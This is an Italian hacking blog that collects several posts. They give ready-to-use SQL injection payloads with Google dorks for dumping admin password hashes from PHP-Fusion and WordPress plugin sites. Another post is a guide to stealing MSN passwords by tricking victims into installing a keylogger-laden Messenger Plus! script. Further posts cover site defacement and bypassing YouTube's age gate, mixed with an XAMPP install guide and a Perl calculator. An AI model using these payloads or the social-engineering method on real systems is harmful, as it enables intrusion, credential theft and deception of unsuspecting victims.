kacker1one’s Weblog

Questo tipo di exploit e relativamente un gioco da ragazzi.
1.Il Bug si trova nell index.php.
2.Facciamo una ricerca con google DorK cioe http://www.blackwebsearch.com/index.html Al meno coi mi risulta a me..
3.Troviamo la vittima cercando con dork /infusions/arcade/
4.Aggiungiamo:

exploit:index.php?op=view_game_list&cid=-1/**/union/**

/select/**/null,user_name,user_password,

null,null,null/**/from/**/fusion_users/*

al nostro sito e vuala e fatta.
Davanti a voi tutte le hash delle password del sito compresa quella del admin
Troviamo la password e siamo Admin.

ECCOVI UN ALTRA GUIDA PER RUBBARE PASSWI MSN …

l tutto a puro scopo informativo, dove è possibile scoprire la password di un contatto di MSN facendogli installare un semplice script per Messenger Plus! Live. Prima di tutto la vittima deve aver installato Messenger Plus! Live. Per capirlo basta chiederlo oppure vedere se ha il nickname colorato.

Ora resta che vi scaricate msgXs 1.5 da QUI e inviarlo alla vittima. Pultroppo il rpoblema più grande e quello di far cascare la vittima ad aprirlo, e questo lo si può fare dicendogli che lo script ha una funziona vera. Lafunziona esiste davvero ed è quello di cambiare il Messaggio Personali direttamente da una Chat. I comandi di questa funziona sono:

1. !mp:[Messaggio nel PSM] = Con questo comando inserirete un nuovo Messaggio nel PSM di MSN. Al posto di [Messaggio nel PSM] dovete ovviamente scrivere la frase.
2. !mp:!mpm = Con questo comando potete modificare il vostro Messaggio personale.

Adesso invece vediamo i comandi per rubargli la Pass:

1. MSN aggiornato = E’ il comando con cui vi farete inviare le password all’insaputa dell’utente.
2. ciao-null- = Con questo invece gli farete cancellare la funziona di rubare la password. L’utente però dopo aver ricevuto questa scritta si deve disconettere da Messenger.

Lo script contiene 2 programmi principali:

• MessenPass: il programma con cui ruberete le password memorizzate.
• msgXs Keylogger: Il programma keylogger dove salverà le passwrod quando l’utente accederà ad MSN.

Quando la vittima avvierà lo script essa non potrà più cancellarlo perchè si riattiverà quando riavvia il sistema. Per rimuovere questo script allora bisogna andare nella cartella C:\Programmi\Messenger Plus! Live\Scripts e cancellare la cartella msgXs. E’ consigliato inoltre che la vittima chiede e riapre Messenger per rubare le password giuste. Questo è consigliato perchè quando la vittima chiude e riapre MSN il keylogger si avvierà e quindi ci sono più possibilità di scoprire la password. Ovviamente questo metodo funziona 8 volte su 10 ma si può sempre sbagliare.

Per scoprire se vi stanno facendo un attacco simile a voi, e voi avete installato questo script, allora spunterà una finestrella a destra del desktop con la scritta: Errore di connessione, Riprova più tardi. Se la vittima ha versioni più vecchie della 8.5, può capitare che non funzioni.

Lo script è stato creato da Suxsem e modificato da Me. Per scaricare la versione originale, problemi o domande chiedete qui oppure sul Forum in questo Topic.

FONTE ..HackingBlog

eccovi un nuovo video come entrare in un server e fare quello che volete,,,
IL VIDEO E SOLO A SCOPO INFORMATIVO…..
SCARICA VIDEO

XAMPP è un pacchetto software gratuito contentente Apache HTTP Server, il database MySQL e tutti gli strumenti necessari per utilizzare i linguaggi di programmazione PHP e Perl.

In passato questo software si chiamava LAMPP, ma per evitare malintesi gli sviluppatori hanno deciso di rinominarlo in “XAMPP per Linux”. Se quindi stavi cercando LAMPP sei nel posto giusto.

Vediamo ora come installare XAMPP in 5 minuti:

DOWNLOAD

Da sourceforce scaricate l’ultima versione di XAMPP in formato compresso .tar.gz.

INSTALLAZIONE

Aprite il terminale e recatevi nella cartella in cui avete appena scaricato XAMPP.

A questo punto loggatevi come root eseguendo il solito comando

sudo su

Create la cartella /opt

mkdir /opt

Estraete l’archivio

tar xvfz xampp-linux-1.6.6.tar.gz -C /opt

AVVIO

Sempre da terminale lanciate il prossimo comando per avviare XAMPP

/opt/lampp/lampp start

Se tutto è andato a buon fine vi dovrebbe comparire un messaggio simile a questo

Starting XAMPP 1.6.6…
LAMPP: Starting Apache…
LAMPP: Starting MySQL…
LAMPP started.

Ora tutto è pronto, Apache e MySQL sono in esecuzione.

TEST

Per verificare che tutto funzioni alla perfezione provate ad andare su localhost inserendo il seguente indirizzo sul vostro browser

http://localhost

Se compare una pagina di XAMPP avete la conferma che è tutto ok.

A questo punto potete iniziare ad inserire i vostri progetti PHP nella seguente directory:

/opt/lampp/htdocs/

Provate ad esempio a creare un progetto di prova (/opt/lampp/htdocs/prova) contenente una pagina esempio.php.
Per visualizzare la pagina contenente codice PHP dovete aprire il browser e recarvi all’indirizzo http://localhost/prova/esempio.php

Sono stato spiegato?

#!/usr/bin/perl1.0.0
print “Calcolatrice ago\n”;
print “Comandi: 1 addiziona, 2 sottrae, 3 moltiplica e 4 divide\n”;
print “inserisci il primo numero qui sotto\n”;
$a=<STDIN>;
print “inserisci 1 o 2 o 3 o 4 a seconda dell’operazione da compiere\n”;
$b=<STDIN>;
print “inserisci il secondo numero\n”;
$c=<STDIN>;
if ($b == 1) { print “Ecco a te il risultato :\n” .($a+$c). “\n”; }
elsif ( ($b == 2) && ($a >= $c) ) { print “Ecco a te il risultato :\n” .($a-$c). “\n”; }
elsif ( ($b == 2) && ($a < $c) ) { print “error: in una sottrazione il primo numero deve essere maggiore o uguale al secondo\n”; }
elsif ($b == 3) { print “Ecco a te il risultato :\n” .($a*$c). “\n”; }
elsif ($b == 4) { print “Ecco a te il risultato :\n” .($a/$c). “\n”; }
else { print “error: ricorda devi inserire 1 per l’addizione 2 per la sottrazione 3 per la moltiplicazione e 4 per la divisione\n”; }
print “Calcolatrice     ago\n”;

oggi vi spiego cm defacciare un SITO con il bug che si trova:

# modules.php?name=roportaj&op=listarticles&secid=

SCUSATE SE TROVATE QUALCHE ERRORE MENTRE FACCIO LA GUIDA …..è STATA FATTA STAMANE ALLE 6 QUANDO SONO VENUTO DA LAVORO…… ….DOWNLOAD VIDEO

eccovi un video :DEFFACCIATO ForumFreeSCARIVA VIDEO

#########################################################################
#
# WordPress Plugin (wordspew-rss.php) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################

DORK 1 : allinurl: “wordspew-rss.php”

DORK 2 : allinurl: “wp-content/plugins/wordspew”

DORK 3 : allinurl: “wordspew/wordspew-rss.php”

#########################################################################
EXPLOIT :

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user
_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c)
,4,5/**/FROM/**/wp_users

#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################

Bene iniziamo andiamo a cercare “sex” su youtube, prendiamo un video a caso http://youtube.com/watch?v=HHyCPgV-Ypc Naturalmente non ce lo fa vedere e come possiamo notare ci ha reindirizzato a questa pagina http://youtube.com/verify_age?next_url=/wa…v%3DHHyCPgV-Ypc dove possiamo notare la scritta che non ci permette di far vedere il video:

La pagina http://youtube.com/verify_age?next_url=/wa…v%3DHHyCPgV-Ypc ci appare quando andiamo a cliccare su qualsiasi video non permesso.
Quindi dobbiamo tornare in dietro e prendere il link del video che abbiamo già detto in precedenza: http://youtube.com/watch?v=HHyCPgV-Ypc arrivati a questo punto modifichiamo il link togliendo watch?v= e mettendo v/ quindi verrà una cosa simile http://youtube.com/v/HHyCPgV-Ypc adesso il link è accessibile con un’altro vantaggio di vedere il video molto più grande del solito . Bene adesso posso dirvi: Buona Visione!